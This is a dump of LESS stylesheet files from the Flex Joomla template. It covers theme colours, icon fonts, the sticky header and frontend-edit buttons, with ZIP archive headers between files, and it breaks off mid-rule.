		border-bottom-color: fade(white, 77%);
	}
	&.sppb-btn-3d:hover,
	&.sppb-btn-3d.focus,
	&.sppb-btn-3d:focus,
	&.sppb-btn-3d:active,
	&.sppb-btn-3d.active,
	&.open > .dropdown-toggle.sppb-btn-3d {
		border-bottom-color: #fff;
	}
}
.btn-flex,.sppb-btn-flex {
	color:#fff;
	border-color:lighten(@major_color, 20%);
	background-color: fade(white, 25%);
	box-shadow:0 2px 5px fade(black, 15%);
		&:hover,
		&:focus {
			border-color: lighten(@major_color, 15%);
			color:#fff;
			background-color: fade(@major_color, 70%);
 
		}
	&.sppb-btn-outline {
		color:#fff;
		border-color:lighten(@major_color, 20%);
		background-color: fade(white, 25%);
	}

	&.sppb-btn-outline:hover,
	&.sppb-btn-outline.focus,
	&.sppb-btn-outline:focus,
	&.sppb-btn-outline:active,
	&.sppb-btn-outline.active,
	&.open > .dropdown-toggle.sppb-btn-outline {
		border-color: lighten(@major_color, 15%);
		color:#fff;
		background-color: fade(@major_color, 70%);
	}
		
	&.sppb-btn-3d,
	&.sppb-btn-3d:hover,
	&.sppb-btn-3d.focus,
	&.sppb-btn-3d:focus,
	&.sppb-btn-3d:active,
	&.sppb-btn-3d.active,
	&.open > .dropdown-toggle.sppb-btn-3d {
	  border-bottom-color: lighten(@major_color, 10%);
	}
}

.light {
	>i {
		color:lighten(@major_color, 25%);
	}
	&:hover {
		i {
			color:lighten(@major_color, 30%);
		}
	}
}

// Social
ul.social-icons {

	>li {

		a {	
			&:hover,
			&:hover > i {
				-webkit-transition: all 300ms;
				transition: all 300ms;
				color: lighten(@major_color, 30%);
			}
		}
	}
}

// Login form
.login, .registration{
	.title{
		i.pe {
			color:lighten(@major_color, 20%);
		}
	}
}

// Modal Login
.ap-login,
.ap-signin{
	a{
		i{
			&.pe {
				color:lighten(@major_color, 20%);
			}
		}
	}
}

.ap-modal-login{
	.modal-dialog {
		color:@text_color;
	}
	.title{
		
		i.pe {
			color:lighten(@major_color, 20%);
		}
	}
	.modal-content{
		.modal-body{
			.forget-name-link{
				
				a{
					color:@text_color!important;
					&:hover{
						color: @major_color!important;
					}
				}
			}
		}
		.modal-footer{

			a{
				&:hover{
					color: @major_color!important;
				}
			}
		}
	}
}
//view-profile
.view-profile{
	.select-menu select{
		display: block;
	}
	button{
		&:focus{
			outline: none;
		}
	}
	a[title="Cancel"]{
		background-color: lighten(#555, 20%);
		color:#fff;
		&:hover{
			background-color: lighten(#555, 10%);
		}
	}
}

//my-account-menu
.ap-my-account-menu{
	
	.signin-img-wrap{
		i{
			&.pe {
				color:lighten(@major_color, 30%);
			}
		}
	}
	.dropdown-menu {
		ul.menu{
			
			>li{
				
				a {
					color:@text_color!important;
					
					&:hover {
						background-color:fade(@major_color, 80%);
						color:#fff!important;
						&::before {
							color:lighten(@major_color, 30%);		
						}
					}
				}
		
				&:last-child {
					a {
						color:@major_color;	
						&:hover {
							background-color:fade(@major_color, 80%);
							color:#fff;
							i {
								color:#fff;		
							}
						}
						
						i {
							color:@major_color;		
						}
					}			
				}
				&.active {
					> a {
						background-color:fade(@major_color, 80%);
						color:#fff!important;
					}
				}
					
			}
			
		}
	}
	
}
// Login, Registration, Reset, Remind
.login-wrapper,
.registration-wrapper,
.reset-wrapper,
.remind-wrapper {
	>i {
		&.pe {

			color: fade(@major_color, 7%);
		}
	}
}

.login-wrapper {
	>i {
		&.pe {
			color: fade(#555, 2%);
		}
	}
}

#sp-top-bar {
	ul.social-icons {
		>li {
			a {
				&:hover,
				&:hover > i {
					-webkit-transition: all 300ms;
					transition: all 300ms;
					color: lighten(@major_color, 5%);
				}
			}
		}
	}
	&.onepage {
	
		box-shadow:inset 0 1px 0px fade(black, 5%), inset 0 -1px 0px fade(black, 10%);
		.sp-contact-info {
			li {
				i {
					color: darken(@major_color, 12%);
				}
			}
		}
		.ap-login,
		.ap-signin{
			a{
				i{
					&.pe {
						color:darken(@major_color, 12%);
					}
				}
			}
		}
	}
}
.sp-contact-info {
	li {
		a {
			&:hover {
				color: lighten(@major_color, 15%);
			}
		}
		i {
			color: lighten(@major_color, 15%);
		}
	}
}

// language switcher
.sp-module-content {
	.mod-languages {
		ul.lang-block {

			li {
				&.lang-active {
					a {
						i {
							color:lighten(@major_color, 20%);
						}
					}
				}
			}
		}
	}
}

// Breadcrumbs
ol.breadcrumb  {
	li {
		a {
			&:hover {
				color:lighten(@major_color, 25%);
			}
		}
	}
}

// Module
.sp-module, .sppb-addon-module {
	ul {
		>li {
			>a {
				color:lighten (@text_color, 10%);
				&:hover {
					color: @major_color;
				}
			}
		}
	}
	// White links (custom)
	&.white {
		.sppb-addon-content {

			ol {
				>span {
					color: #e2e2e2;
				}
				li {
					color: #e2e2e2;
					a {
						color:#fff;
						&:hover {
							color:lighten(@major_color, 25%);
						}
					}
				}
			}
		}
	}
	&.dark {
		ul {
			>li {
				>span {
					>a {
						color:lighten(@major_color, 5%);
						&:hover {
							color:lighten(@major_color, 20%);
						}
					}	
				}
				>a {
					color:lighten(@major_color, 10%)!important;
					&:hover {
						color:lighten(@major_color, 25%)!important;
					}
				}
			}
		}	
	}

	.latestnews {
		>div {
			>a {
				color: @text_color;
				&:hover {
					color: @major_color;
				}
			}
		}
	}

	ul.category-module, .relateditems {
		>li {
			>a {
				color:lighten(@major_color, 10%);

				>div.related-date {
					color:lighten (@text_color, 60%);
					>i {
						color:lighten (@major_color, 20%);
					}
				}
			}
			span, p {
				color:lighten (@text_color, 60%);
				>i {
					color:lighten (@major_color, 20%);
				}
			}
		}
	}
	
	//Articles-category module
	ul.category-module {
		>li {
			a.mod-articles-category-title {
				color: @text_color;
				&:hover {
					color: @major_color;
				}
			}
		}
	}

	.tagscloud {
		.tag-name {
			color:lighten (@text_color, 40%);
			&:hover {
				background:lighten (@major_color, 5%);
				border-color:@major_color;
				color:#fff;
			}	
		}
	}
}
// Tags
.tag-category {
	ul.category {
		li {
			h3 {
				>a {
					color:lighten (@text_color, 35%);
					&:hover {
						color:@major_color;
					}
				}
			}
		}
	}
}
.tags {
	a.label {
		background-color:rgba(45,45,45,0.45);
		
		&:hover {
			background:lighten (@major_color, 5%);
		}
	}
	>span {
		>i {
			color:lighten (@text_color, 77%);	
		}
	}
	&:hover {
		>span {
			>i {
				color:lighten (@text_color, 57%);
				
			}
		}
	}
}

// SP Simple Portfolio
.sp-simpleportfolio {
	.sp-simpleportfolio-filter {
		> ul.simple {
			> li {
				> a {
	   				color:lighten (@text_color, 10%);
					&:hover {
						color: @major_color;
					}
			    }
				&.active {
					> a {
						color: @major_color;
						&:hover {
							color: @major_color;
						}
					}
				}
				span.simple-divider {
					color:lighten(@major_color, 35%);
				}
			}
		}
	}
}
.sp-simpleportfolio,
#mod-sp-simpleportfolio {
	.sp-simpleportfolio-filter {
		> ul.flex {
			> li {
				&.active {
					> a {
						background: @major_color;
					}
				}
				> a {
					&:hover {
						background: @major_color;
					}
				}
			}
		}
	}
	.sp-simpleportfolio-item {
		.sp-simpleportfolio-btns {
			a {
				background-color: @major_color;
				background-color: fade(@major_color, 80%);
				&:hover {
					background-color: @major_color;
					box-shadow:0 1px 3px rgba(0,0,0,.3);
				}
			}
		}
	}
}

.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fas,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.far {
  color: @major_color;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fas,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.far {
  color:lighten(@major_color, 10%);
}

// for all inputs
input[type="text"] {
	&:focus {
		border:1px solid @major_color;
	}
}
			
				
// Search
.search {
	
	input#mod-search-searchword,
	input#search-searchword,
	input#mod_virtuemart_search {
		&:focus {
				border:1px solid @major_color;
		}
	}
	
	&:before {
		color:lighten(@major_color, 10%);
	}
	&:hover:before,
	&:focus:before,
	&:active:before {
		color:lighten (@text_color, 10%);
	}
	.btn-toolbar {
		button {
			background: @major_color;
		}
	}
}

// Blog
.post-format-masonry > i {
	background-color: @major_color;
	background-color: fade(@major_color, 70%);
} 
.post-format {
	background-color: @major_color;
	background-color: fade(@major_color, 90%);
} 

.entry-link,
.entry-quote {
	background-color: @major_color;
	background-color: fade(@major_color, 90%);
}

blockquote {
	border-color: @major_color;
}


// Comingsoon
.sp-comingsoon {
	body {
		background-color:darken(@major_color, 5%);
	
		#sp-comingsoon {	
			ul.social-icons {	
				>li {
					a {
						&:hover,
						&:hover i {
							color: #fff;
						}
					}
				}
			}
		}
		&.with-bckg-img {
			a.logo {
				background: rgba(20,20,20,.45);
			}
			.days .number,
			.hours .number,
			.seconds .number,
			.minutes .number{
				border: 1px solid fade(white, 50%);
				background-color: fade(black, 20%);
			}
			.social-icons {
				background-color: fade(black, 20%);
			}
		}
	}
}

// Pagination 
.pagination>li>a,
.pagination>li>span {
	color: @text_color;
	&:hover,
	&:focus {
		color: @text_color;
	}
}

.pagination>.active>a,
.pagination>.active>span {
	border-color: @major_color;
	background-color: @major_color;
	&:hover,
	&:focus {
		border-color: @major_color;
		background-color: @major_color;
	}
}
// Addons 
.sppb-addon h3.sppb-addon-title {
	color: lighten(@text_color, 10%);
	
	&:after{
		background:lighten(@major_color, 10%);
	}		
}

// Accordion
.sppb-panel-default {
	.sppb-panel-heading {
	   .sppb-panel-title {
			>i {
				color:lighten(@text_color, 40%);
			}
		}
	   &.active,
	   &.active:before {
		  color: @major_color;
		   .sppb-panel-title {
			   color: @major_color;
		   }

			.sppb-panel-title {
				>i {
					color:lighten(@major_color, 10%);
				}
			}
	   }
	}
}
.sppb-panel-primary {
  border: none;
	  >.sppb-panel-heading {
	background-color: @major_color;
	}
}
// custom "flex" style
.sppb-panel-flex {
	  >.sppb-panel-heading {
		   .sppb-panel-title {
				>i {
					color:lighten(@text_color, 40%);
				}
			}
			&:after {
				color:lighten(@text_color, 50%);
			}
		  
		&.active {
		   border-bottom: 1px solid @major_color;
			&:after {
				color:@major_color;		  
			}  
			.sppb-panel-title {
				>i {
					color:@major_color;
				}
			}
		}	
	  
		+.sppb-panel-collapse > .sppb-panel-body {
		  border-bottom: 1px solid @major_color;
		}
		
	}		
}
// Countdown addon
.sppb-addon-countdown {
    &.flex {
		.sppb-countdown-number {
			background-color: @major_color;
			border: 2px solid rgba(0,0,0,.2);
			text-shadow:1px 1px 1px rgba(0,0,0,.3);
		}
	}
}

// Entry header
.entry-header {
	h1, h2 {
		a {
			color:@text_color;
				&:hover,
				&:focus {
					color:@major_color;
				}
		}
		&:after{
			background:lighten(@major_color, 10%);
		}
	}
}


// Typography
.html-style span {
  background: lighten(@major_color, 8%);
}
ul.site-list {
	li {
	  color:@text_color;
		i {
		  color: lighten(@major_color, 8%);
		}
	}
}
.bullets {
	.li-circle {
	  color: @major_color;
	}
}
.dropcaps {
	.naked-drop {
		span {
			color: @major_color;
		}
	}
	.full-drop {
		span {
			background: @major_color;
		}
	}
}

// Module
.sp-module {
	.sp-module-title {
		color: lighten(@text_color, 10%);
		&:after{
			background:lighten(@major_color, 10%);
		}
	}
}

// cd pagination (custom)
.cd-pagination {
  li {
	  &.active {
		  >a {
			  background-color: @major_color;
			  color: #fff;
		  }
	  }
	}
}
.cd-pagination {
	a {
	  background-color: darken(#fff, 2%);
	  &:hover,
	  &:focus {
		  background-color: @major_color;
		  color: #fff;
		}
	  &:active {
		  background-color: darken(@major_color, 20%);
	   }
	}
}

//Image (single) addon
.sppb-addon-single-image {
	.sppb-addon-content {
		a {
			.overlay {
				>i {
					&:before {
						background-color:fade(@major_color, 80%);
					}
				}	
				&:after {
					background-color:fade(#333, 25%);
					box-shadow:inset 0 0 50px fade(#333, 90%);
				}
			}		
		}
	}
}

// Progress bar
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
	background-color: @major_color;	
}
.sppb-nav-tabs {
	>li {
		>a {
			color:@major_color;
		}
		&.active {
			>a {
				color: lighten (@text_color, 20%);
			}
		}
	}
}

// Tabs (Flex style)
.flex {
	.sppb-tab {
		.sppb-nav-tabs {
			>li.active {
				>a {
					border-top-color:lighten(@major_color, 10%);
					&:hover,
					&:focus {
						border-top-color:lighten(@major_color, 10%);
					}
				}
			}
		}
	}
}
//Modern style
.sppb-nav-modern {
	>li {
		>a {
			background:transparent;
			color: lighten (@text_color, 20%);
		}
		&.active {
			>a {
				color: @major_color;
				&:hover,
				&:focus {
					color: @major_color;
				}
			}
		}
	}
}
// Tabs (pills style)
.sppb-nav-lines {
	>li {
		>a {
			
			background: transparent;
			
			>i {
				color: lighten (@text_color, 40%);
			}
			
			&:hover,
			&:focus {
				>i {
					color: lighten (@text_color, 20%);
				}
			}
	
		}
		&.active {
			>a, >a:focus, >a:hover {
				background-color: transparent;
				color:@major_color;
				border-bottom-color: @major_color;
				
				>i {
					color:@major_color;
				}
			}
		}
	}
}
// Tabs (pills style)
.sppb-nav-pills {
	>li {
		>a {
			color: lighten (@text_color, 20%);
			background: transparent;
			
			>i {
				color: lighten (@text_color, 40%);
			}
			
			&:hover,
			&:focus {
				>i {
					color: lighten (@text_color, 20%);
				}
			}
		
		}
		&.active {
			>a {
				background-color: transparent;
				color:@major_color;
				box-shadow:inset 0 0 0 1px @major_color;
				
				>i {
					color:@major_color;
				}
			}
		}
	}
}

// Testimonial 
.sppb-addon-testimonial {
	.sppb-addon-testimonial-rating {
		i.fa-star {
			color:lighten(@major_color, 10%);
		}
		i.fa-star-o, i.far.fa-star {
			color:lighten(gray, 25%);
		}
	}
}

// Testimonial Flex
.pro-client-url {
	color: @major_color;	
}

// Pricing Table
.sppb-pricing-box {	
	box-shadow:inset 0 0 1px lighten(#333, 40%);

	&.sppb-pricing-featured {
		background:transparent;
		.sppb-pricing-header {
			background-color: @major_color;

		}
		.sppb-pricing-features {
			color:@text_color;	
		}
	}	

}					

// Latest blog posts (addon)

.sppb-addon-latest-posts{
	.latest-post{
		.latest-post-inner,.latest-post-item{
				div.img-wrapper {
					position: relative;
					overflow: hidden;
					 max-width:100%;
					>a {	
						&:after {
							background:@major_color;
						}
					}
				}
			h2.entry-title{
				a {
					color:lighten (@text_color, 25%);
				}
			}
			&:hover {
				h2.entry-title{
					a {
						color:@major_color;
					}
				}
			}
		}
	}
}

//Modal Popup
.light {
	.sppb-selector {
		span {
			i {
				color:lighten(@major_color, 30%);
				.transition(all .3s ease-in-out);
			}
		}
		>i {
			color:lighten(@major_color, 25%);
		}

		&:hover {
			span {
				i {
					color:#fff;
				}
			}
			i {
				color:lighten(@major_color, 30%);
			}
		}
	}
}

// Google Maps (addon)
.flex {
	.sppb-addon-content {
		.gm-zoom-in, .gm-zoom-out {
			background-color:lighten(@major_color, 10%);
			opacity:0.77;
			&:hover {
			  background-color:lighten(@major_color, 5%);
			  opacity:1;
			}
		}
	}
}

.sppb-addon {
	.sppb-icon {
		color:@major_color;
		line-height:1.5;
	}
}

.sppb-media {
	&.default,&.flex {
		>a:hover {
			img.sppb-media-object {
				border-color:@major_color;
			}
			>i {
				border-color:@major_color;
			}
		}
		>.sppb-media-body {	
			>i.fa, >i.fas {
				color:lighten(@major_color, 30%);
			}
		}
	}
	footer {
		strong {
			color:lighten(@major_color, 5%);
		}
	}
}


.sp-module, .sppb-addon-module {
	.sp-module-title {
		color: lighten(@text_color, 10%);
		.divider{
			background:lighten(@major_color, 10%);	
		}
	}
	.divider{
		background:lighten(@text_color, 80%);

	}
}
		
// Ajax Contact Form
.sppb-ajaxt-contact-form {
	.sppb-form-group {
		
		.sppb-form-control {
				
			&[placeholder] {
		
				&::-webkit-input-placeholder {
					
					&:before {
					  color:lighten(@major_color, 20%);
					}
				}

				&:focus {
					border:1px solid lighten(@major_color, 5%);
					box-shadow:0 0 5px fade(@major_color, 30%);
				}
			}
		}
	}
}
.sppb-addon-ajax-contact {
	&.dark {
		.sppb-form-group {
			
			label {
				color:#ddd;
				color:fade(white, 65%);
			}
		}
		.sppb-form-control {
			
			label {
				color:#ddd;
				color:fade(white, 65%);
			}
			
			&[placeholder] {
				color:#f0f0f0;
				border:1px solid #999;
				border:1px solid rgba(200,200,200,0.8);
				background:transparent;
				
				&::-moz-placeholder {
					color:fade(white, 65%);
				}
				
				&::-webkit-input-placeholder {
					color:fade(white, 65%);
					&:before {
					  color:lighten(@major_color, 12%);
					}
				}
				
				&:focus {
					border:1px solid lighten(@major_color, 15%);
				
				}
				
			}
		}
		/* Checkbox (terms of service) for “dark” style background */
		.tos {
			label {
				color:#ddd;
				color:fade(white, 65%);
				
				a {
					color:lighten(@major_color, 15%);
					
					&:hover {
						color:lighten(@major_color, 25%);
					}
				}
			}
		}
	}
}
.acym_module_form {
	.acysubbuttons-icon {
		&::before {
			background:@major_color;
		}
	}
}
.dark {
	.acymailing_form {
		.acysubbuttons {
			color:lighten(@major_color, 17%);
			&:focus {
				border:1px solid lighten(@major_color, 15%);
			}
		}
	}
	.acym_module_form {
		input.cell {
			color:lighten(@major_color, 30%);
			//border:1px solid rgba(200,200,200,.5);
			&:focus {
				border:1px solid lighten(@major_color, 15%);
			}
		}
	}
}

// Timeline addon (from SPPB 2.3.5)
.sppb-addon-timeline {
	.sppb-addon-timeline-wrapper {
		&:before {
			background-color: lighten(@major_color, 20%)!important;
		}
		.timeline-badge {
			&:before {
				border: 2px solid lighten(@major_color, 10%)!important;
			}
			&:after{
				background-color: lighten(@major_color, 20%)!important;
			}
		}
	}
}


// Form Builder Addon (from SPPB 3.4.4)

.form-builder-checkbox-item label::before,
.form-builder-radio-item label::before,
.sppb-addon-form-builder .sppb-form-check-label::before{
	border:2px solid lighten(@major_color, 15%);
}
.form-builder-checkbox-item input:checked+label::before,
.form-builder-radio-item input:checked+label::before,
.sppb-addon-form-builder .sppb-form-check-input:checked+label::before{
	background:lighten(@major_color, 5%);
	box-shadow:inset 0 0 5px rgba(0,0,0,0.2);
}


// Error Page
.error-page {

	.error-page-inner {
	
		>div.container {
			
			.btn-error {
				background:lighten(@major_color, 5%);
			
				&:hover{
					background: @major_color;
				}
			}
			.fa-exclamation-triangle {
				color:lighten(@major_color, 15%);
			}
		
			.error-code {
				color:lighten(@major_color, 10%);

			}
				
		}
		&.with-bckg-img {
			div.container {
				.pe-7s-compass {
					color:#fff;
					text-shadow: 1px 3px 6px fade(black, 10%);
				}
				.error-code {
					color:lighten(@major_color, 5%);
				}
			}
		}
	}
}


// AP Smart LayerSlider
.sp-layer {
	h1,h2,h3,h4,h5,h6, i.major_color {
		color:lighten(@major_color, 5%);
	}
}
.sp-button{border-color:lighten(@major_color, 15%)!important;}
.sp-selected-button{background-color:@major_color!important;}


// Virtuemart

.vmCartModule {
	
	#cd-lateral-nav {
		.cd-navigation {
			color:@text_color;
			.cart-item {
		
				.product_name {
					a {
					  color:@major_color!important;
					  
					  &:hover {
						  color:darken(@major_color, 15%)!important;
					  }
					}
				}
			}
			.show-cart {
				color:#fff;
			}
		}
	}
	
}

.quantity {
	background-color: fade(@major_color, 80%);
}
.cd-customization {
	.add-to-cart {
		background-color: @major_color;
		&:hover {
			background-color: darken(@major_color, 7%);
		}
	}
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: darken(@major_color, 7%);
} 

//product details page
.productdetails-view {
	.vm-product-details-inner{
		
		.product-price{
			
			.vm-price-desc+span{
				color: @major_color;
			}
		}
		.product-short-description{
			h4{
				color:#555;
				>i {
					color:lighten(@major_color, 12%);
				}
			}
		}

		.product-neighbours{
			a.previous-page,
			a.next-page{
				&:before,
				&:after{
					color: #fff;
					background: fade(#555, 30%);
				}
				&:hover {
					&:before,
				    &:after{
						background: fade(@major_color, 100%);
					}
				}
			}

			.empty-previous-page,
			.empty-next-page {
				color: #fff;
				text-shadow:1px 1px 0px fade(#555, 8%);
				box-shadow:inset 0 0 0 1px fade(#555, 8%);
			}
		}
	}
	// products icons (pdf,print,email)
	.icons {
		a {
			box-shadow:inset 0 0 0 1px fade(#555, 10%);
			
			&:hover {	
				color:#fff;
				background: fade(@major_color, 80%);		
			}
		}
	}
	
	// products information tab
	.products-desc-tab{
		.nav-tabs{
			>li.active {
				>a {
					background:transparent;
					border-bottom:1px solid #fff;
					border-right:1px solid #e2e2e2;
					border-left:1px solid #e2e2e2;
					box-shadow:0 -1px 0px @major_color;
					border-top:1px solid fade(@major_color, 80%);
				}
			}
		}

		.tab-content{
			.customer-reviews{
				.list-reviews{
					span.date{
						>i {
							color:lighten(@major_color, 15%);
						}
					}
				}
			}
		}
	}
}
.empty_cart {
	>i.pe {
		>span{
			color:#fff;
			background-color:fade(@major_color, 35%);
		}
	}
}

#fancybox-wrap{	
	#fancybox-content{
	    .continue_link,.showcart{
		    color: #fff;
			background-color:@major_color;
	    }
	}
}

// Cart Page
.cart-view{
	
	input[value="Logout"],
	input[name="changeShopper"],
	input[value="Search in shop"] {
		background-color: @major_color;
	    &:hover{
	    	background: darken(@major_color, 5%);
	    }
	}

	fieldset.userdata{
		#com-form-login-remember{
			input{
				background-color: @major_color;
				&:hover{
					background-color: darken(@major_color, 10%);
				}
			}
		}
	}
	.billto-shipto{
		a.details{
			background: @major_color;
			&:hover{
				background: darken(@major_color, 10%);
			}
		}
	}
  //Cart Table
  table.cart-summary{
    tr{
      th{
        background: @major_color;
        border: solid 1px @major_color;
      }
    }
    input.details-button{
    	background: @major_color;
    }
    .vm2-add_quantity_cart{
    	background: @major_color;
		}
	} 
 }
.sectiontableentry1 {
     td {
		 a.change-payment {
			 color:lighten(@major_color, 10%);
			
			 &:hover {
				 color:@major_color;
			 }
		 }
   }
}

//Cart Table		
.vm-button-correct{
	background-color:@major_color;
	&:hover {
	  background-color:darken(@major_color, 5%);
	}
}
.vm-button{
	background-color:lighten(@major_color, 10%);
}

#com-form-login-remember, {
	input.default{
		background: @major_color;
		&:hover {
			background: darken(@major_color, 5%);
		}
	}
}
.control-buttons{
	.vm-button-correct{

		background-color: fade(white, 75%);
		border-color: lighten (@text_color, 40%);
		color: lighten (@text_color, 40%);
		&:hover,
		&:focus {
			background-color: fade(white, 95%);
			border-color: @major_color;
			color: @major_color;
		}
	}
	button.default{
		background: @major_color;
		&:hover {
			background: darken(@major_color, 5%);
		}
		
	}
}
span.userfields_info {
	color:@major_color;
    border-bottom:1px solid @major_color;
}

.orderby-displaynumber{

	.vm-order-list {
		.orderlistcontainer{
			
			border: 1px solid fade(gray, 20%);
			
			.title {			
				&:before {
					color:lighten(#555, 25%);
				
				}
			}
	
			.orderlist {
				  border-left:1px solid fade(gray, 30%);
				  border-right:1px solid fade(gray, 30%);
				  background:fade(white, 90%);
				 
				  div {
					  a {
						
						 color:@text_color;
						 border-bottom:1px solid fade(gray, 30%);
					  }
				
				  }
		
			}
		}
	}
}

.sp-module-content{
	
	ul.VMmenu{
		li{	
			div {
				> a{
					>.nmb_products {
						color:@text_color;
					}
				}
			}

		}
	}
}

.vm-flex-search {
	input {

		&:focus {
			border:1px solid @major_color;
			+ .vm-search-button {
				>i {
					color:@major_color;
				}
			}	
		}

	}

	.vm-search-button {
		>i {
			color:lighten(@major_color, 15%);
		}
	}
}

.currency-selector-module {
	button.btn,
	input.btn {
		>i {
			color:#555;
			&:hover {
				color:@major_color;
			}
		}
	}
}

.chzn-container-active {
	.chzn-single  {
		border: 1px solid @major_color!important;
	}
	&.chzn-with-drop {
		.chzn-results {
			li {
				&.highlighted {
			        background:fade(black, 40%);
				}
			}
		}
	}
}

.vm-price-box ins{ color:@major_color; }

//Header (title) in Megamenu
.vm-menu {
	.vm-title {
		border-top:1px solid lighten(@major_color, 10%);
	}
	ul.productdetails {
		li{
			.spacer-inner {
				.PricesalesPrice {
					color:@major_color;
				}
			}
		}
	}
}
header.color {
	.vm-menu {
		.vm-title {
			color: lighten(@text_color, 15%);
			border-top:1px solid fade(@text_color, 35%);
		}
		ul.productdetails {
			li{
				box-shadow:0 1px 0px fade(@text_color, 35%);
				
				.spacer-inner {
					.PricesalesPrice {
						color:@text_color;
					}
				}
			}
			&:last-child {
				li {
					box-shadow:none;
				}
			}
		}
	}
}

// Alert
.alert-notice {
	box-shadow: 0 0 0 1px fade(#555, 10%), 0 2px 3px fade(#555, 7%);
}


// SVG Logo
@keyframes fade-in {
  to {
    opacity: 1;
	fill:fade(@major_color, 90%);
	stroke-dashoffset:0;
	stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
	stroke-width:0;
	stroke-dashoffset:0;
	fill:fade(#555, 70%);
	stroke:fade(#555, 70%);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
	stroke-width:5;
	stroke-dashoffset:0;
	fill:fade(@major_color, 85%);
	stroke:@major_color;
  }
}
PK!R�����flex/less/ap-arrows.lessnu&1i�@font-face {
	font-family: 'ap-arrows';
	src:url('../fonts/ap-arrows/ap-arrows.eot?4rtkxz');
	src:url('../fonts/ap-arrows/ap-arrows.eot?#iefix4rtkxz') format('embedded-opentype'),
		url('../fonts/ap-arrows/ap-arrows.woff?4rtkxz') format('woff'),
		url('../fonts/ap-arrows/ap-arrows.ttf?4rtkxz') format('truetype'),
		url('../fonts/ap-arrows/ap-arrows.svg?4rtkxz#ap-arrows') format('svg');
	font-weight: normal;
	font-style: normal;
}

.ap-left:before {
	content: "\e600";
}

.ap-right:before {
	content: "\e601";
}

.ap-left-2:before {
	content: "\e602";
}

.ap-right-2:before {
	content: "\e603";
}

.ap-left-3:before {
	content: "\e604";
}

.ap-right-3:before {
	content: "\e605";
}

.ap-arrow-left:before {
	content: "\e606";
}

.ap-arrow-right:before {
	content: "\e607";
}

.ap-close:before {
	content: "\e608";
}

.ap-minus-1:before {
	content: "\e609";
}

.ap-plus-1:before {
	content: "\e60a";
}

.ap-minus-2:before {
	content: "\e60b";
}

.ap-plus-2:before {
	content: "\e60c";
}

PK!�붪�	�	flex/less/sticky-header.lessnu&1i�
.sp-sticky-logo {
	display:none; /* hide it from start */
}
.sticky__wrapper {
	//top: 0;
	left: 0;
	right: 0;
}
.sticky {
	.sticky__wrapper {
		top:0;
		position:fixed;
		-webkit-transform: translate3d(0,0,0);
		z-index:111;
		-webkit-animation-name:fade-in-down;
		animation-name:fade-in-down;
		-webkit-animation-duration:1s;
		animation-duration:1s;
		-webkit-animation-fill-mode:forwards;
		animation-fill-mode:forwards;
		background-color: rgba(39,39,39,0.75); /* starting color */
		
		/* Backdrop filter added in Flex 3.9.3 */
		-webkit-backdrop-filter: blur(7px);
		backdrop-filter: blur(7px);
		
		.sp-sticky-logo {
			display:block;
			position:absolute;
			top:0;
			max-height:100%;
			padding:5px 0;
			width:auto;
			
		}
		.has-sticky-logo {
			display:none;
		}

	}
	.transparent-wrapper {
		position:absolute;
		z-index:9;
		left:0;
		right:0;
		margin:0 auto;
	}
	
	#cd-lateral-nav {
		min-height:100vh;
	}
	
	
	&.white,
	&.onepage {
		.sticky__wrapper {
			background-color: fade(white, 80%); /* starting color */
			box-shadow:0 2px 6px fade(black, 10%);
		}
	}
	&.transparent {
		.sticky__wrapper {
			background: rgba(40,40,40,.8); /* starting color */
			box-shadow:0 2px 6px fade(black, 10%);
		}
	}
}


// Header-In (3D) Effect
@-webkit-keyframes header-in {
	0%{
		opacity:0;
        -webkit-transform:translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
        transform:translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
	}
	
	100%{
		opacity:1;
        -webkit-transform:translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
        transform:translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
	}
}

@keyframes header-in {
  0%{
		opacity:0;
        -webkit-transform:translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
        transform:translate3d(0,-20px,0) scale(0.9) perspective(1200px) rotateX(-60deg);
	}
	
	100%{
		opacity:1;
        -webkit-transform:translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
        transform:translate3d(0,0,0) scale(1) perspective(800px) rotateX(0deg);
	}
}
.header-in {
    -webkit-animation-name:header-in;
    animation-name:header-in;
	-webkit-transform-origin: 50% 0%;
	transform-origin: 50% 0%;
	//-webkit-backface-visibility: hidden;
	-webkit-animation-duration:1s;
    animation-duration:1s;
    -webkit-animation-fill-mode:forwards;
    animation-fill-mode:forwards;
}
PK!��]ggflex/less/master.lessnu&1i�/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
@import 'variables';
@import 'mixins';
/* @import 'icomoon'; */
@import 'ap-arrows';
@import 'pe-icon';
@import 'menu';
@import 'theme';
@import 'pagebuilder';
@import 'headers';
@import 'pagination';
@import 'typography';
@import 'lightslider';
@import 'virtuemart';
@import 'svg-logo';
@import 'responsive';
@import 'ajax-intro-articles';
@import 'multicolor-gradients';
@import 'sticky-header';
@import 'flex-modal';
PK!6�<\\flex/less/frontend-edit.lessnu&1i�
/*=========================================
 *======= 	  Frontend edit	   ============
 *=======================================*/
.btn.jmodedit {

	background-color:fade(@major_color, 87%);
	background-image:none;
	box-shadow:0 1px 5px rgba(0,0,0,.3);
	min-height:32px;
	text-align:center;
    top: 1px;
    right: 1px;
	overflow:hidden;

	&::before {
		font-family: 'peIcon7';
		content: "\e62c";
		color:#fff;
		text-shadow:1px 1px 1px rgba(0,0,0,.2);
		font-size:22px;
		line-height:25px;
		right:16px;
		text-align:center;
		vertical-align:middle;
		display: block;
		position:absolute;
		top:1px;
	}
}


.layout-edit {
	
